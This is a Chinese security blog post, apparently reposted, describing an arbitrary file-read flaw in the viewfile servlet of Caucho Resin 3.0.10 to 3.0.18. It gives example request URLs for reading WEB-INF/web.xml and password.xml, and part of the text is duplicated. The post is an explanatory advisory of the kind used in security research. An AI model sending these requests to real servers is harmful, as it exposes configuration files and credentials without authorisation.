Resin viewfile远程文件读取漏洞

没穿底裤 2020年1月1日04:07:18评论883 views字数 1156阅读3分51秒阅读模式
摘要

Finger (Save water. Shower with your girlfriend.) | 2014-01-13 12:04受影响系统:Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
[php]
http://localhost/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight
viewfile servlet[/php]
可以无需参数在Web主目录中浏览任意文件:
[php]
http://localhost/resin-doc/viewfile/?file=index.jsp
[/php]
请注意这句话:

Finger (Save water. Shower with your girlfriend.) | 2014-01-13 12:04

受影响系统:

Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
[php]
http://localhost/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight
viewfile servlet[/php]
可以无需参数在Web主目录中浏览任意文件:
[php]
http://localhost/resin-doc/viewfile/?file=index.jsp
[/php]
请注意这句话:

攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
[php]
http://localhost/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
[/php]描器扫出来的这些,证明不了什么
[php]
http://localhost/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml
http://localhost/resin-doc/examples/security-basic/viewfile?file=password.xml
examples = 例子
[/php]
有人可能会觉得读出password.xml了,是敏感信息,下面是我刚下载的resin内resin-doc/examples/security-basic/WEB-INF/password.xml文件的内容,可以和大家读到的对比下。

这个文件只是examples!
[php]

[/php]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:07:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Resin viewfile远程文件读取漏洞https://cn-sec.com/archives/75377.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息